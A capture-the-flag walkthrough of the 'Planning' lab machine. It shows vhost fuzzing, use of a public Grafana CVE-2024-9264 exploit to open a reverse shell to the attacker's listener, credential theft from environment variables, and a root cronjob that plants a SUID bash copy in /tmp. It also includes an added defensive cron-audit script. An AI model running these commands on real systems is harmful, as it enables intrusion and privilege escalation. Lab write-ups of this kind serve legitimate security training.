Planning

IP Address: 10.10.11.68

Machine Information

As is common in real-life pentests, you will start the Planning box with credentials for the following account:

admin / 0D5oT70Fq13EvB5r

Challenge

Nmap Scan

As part of the initial reconnaissance, we can perform an Nmap scan against the target system to look for the open ports.

sudo nmap -sS -sV -sC -vv -T5 <--IP Address-->

From the Nmap result we can see that only two ports are open: port 22 (SSH) and port 80 (HTTP).

For easier access, let's add the IP address to our /etc/hosts file with the domain planning.htb.

sudo nano /etc/hosts

Contents:

<--IP Address--> planning.htb

Web Application Fuzzing

Browsing to http://planning.htb, we are greeted with an education platform page.

Looking around the web application, we don't find anything important or a lead to follow.

Fuzzing for files and directories with ffuf also led nowhere.

But fuzzing for virtual hosts with the bitquark-subdomains-top100000.txt wordlist from SecLists, I found a virtual subdomain.

ffuf -w <--Location to your SecList-->/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://planning.htb" -H "HOST:FUZZ.planning.htb" -fs 178

With this found, let's add it to the /etc/hosts file as well.

sudo nano /etc/hosts

Contents:

<--IP Address--> grafana.planning.htb

Browsing to the subdomain http://grafana.planning.htb/ we are greeted with a login page.

We can log in to this interface with the given credentials:

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

And we get the Grafana dashboard.

Exploiting Grafana

Looking at the version of Grafana installed on the target system, we find that it is vulnerable to command injection and local file inclusion (LFI) via SQL expressions (CVE-2024-9264).

While searching for an exploit for this vulnerability, we find a GitHub repository by z3k0sec showcasing an RCE exploit via SQL expressions.

So, let's clone this repository on our Kali Linux machine.

git clone https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit.git

Inside the folder, we find a Python script called poc.py, which we execute to get a reverse shell back to our Kali Linux machine.

Usage:

python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

So, first let's set up a listener in our terminal.

nc -lvnp 12345

Now, run poc.py.

python3 poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip <--Your Machine IP Address--> --reverse-port 12345

We get a reverse shell back!

Enumeration of the User!

Going through the system, we find that we are inside a Docker container.

Searching further, I stumble upon what looks like user credentials in the environment variables.

env

Using these credentials, we can try logging in to the system through SSH.

ssh <--Username-->@<--IP Address-->

And we get the user flag here!

Root Hunt

Cronjob

After finding the user flag, while searching for further hints, we find a folder /etc/crontabs containing two .db files.

This cronjob has two tasks:

  • Back up the root_grafana Docker container into a password-protected zip file
  • Run a script cleanup.sh every minute

Both of these tasks run as root.

Hidden Cronjob!

While looking at the running services and listening ports on the server, we notice some ports that are bound only to localhost:

netstat -tupln

  • 3000
  • 8000

Neither of these is a standard port number, and neither is reachable from outside the host. That raises our suspicion.

So, we open another terminal and set up an SSH local port forward to port 8000 on the target:

ssh enzo@<--IP Address--> -L 8000:127.0.0.1:8000

Now, in our web browser, we open http://localhost:8000

It asks for credentials. Assuming the credentials found in crontab.db are reused here, we try to log in.

  • Username: root

And we log in!

On this page, we can see the two cronjobs listed.

Also, we can create our own cronjobs!

Here, create a new job with the following parameters:

  • Name: Root Shell
  • Command: cp /bin/bash /tmp/shell && chmod u+s /tmp/shell
  • Schedule: Every minute
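
From a defender's side, the job above is exactly the kind of entry a cron audit should flag. The following Python audit is an added example, not part of the original writeup: it scans crontab lines for a copy of a shell binary, a setuid bit being set, or a path under a world-writable directory. The sample crontab is constructed for the example, not taken from the box.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab (user-crontab format), not taken from the target.
# Lines 3 and 4 reproduce the pattern used in this writeup.
SAMPLE_CRON = """\
*/5 * * * * /usr/local/bin/backup-grafana.sh
* * * * * /root/scripts/cleanup.sh
* * * * * cp /bin/bash /tmp/shell && chmod u+s /tmp/shell
*/10 * * * * install -m 4755 /bin/sh /var/tmp/.x
"""

SHELL_BIN = r"(?:/usr)?/bin/(?:ba|da|z|k)?sh\b"
WORLD_WRITABLE = r"/(?:tmp|var/tmp|dev/shm)/"


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list


def _reasons_for(cmd: str) -> list:
    reasons = []
    # A cron job that copies a shell interpreter is almost never legitimate.
    if re.search(rf"\b(?:cp|install)\b[^;&|]*{SHELL_BIN}", cmd):
        reasons.append("copies a shell binary")
    # chmod u+s, chmod 4755 and install -m 4755 all set the setuid bit.
    if re.search(r"\bchmod\b[^;&|]*\b(?:[ugoa]*[+=][rwxt]*s|[4-7]\d{3})\b", cmd) \
            or re.search(r"\binstall\b[^;&|]*-m\s*[4-7]\d{3}\b", cmd):
        reasons.append("sets the setuid bit")
    # Anything placed under /tmp or similar can be replaced by any local user.
    if re.search(WORLD_WRITABLE, cmd):
        reasons.append("references a world-writable directory")
    return reasons


def audit_crontab(text: str) -> list:
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" style lines have one schedule field, others have five.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(parts) < (2 if line.startswith("@") else 6):
            continue
        reasons = _reasons_for(parts[-1])
        if reasons:
            findings.append(Finding(n, parts[-1], reasons))
    return findings
```

Run it against the output of `crontab -l` for each user (and /etc/cron.d) to catch the same pattern before it is used for privilege escalation.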

Now, click Run Now.

In the terminal with the port-forwarding SSH session, go to /tmp and you can see the copied bash binary there.

cd /tmp/
ls

Now, run the SUID bash copy with -p so it keeps the root effective privileges:

./shell -p

Now, we can print out the root flag!!

cat /root/root.txt

And we finish!


Thanks to d00msl4y3r & FisMatHack 😊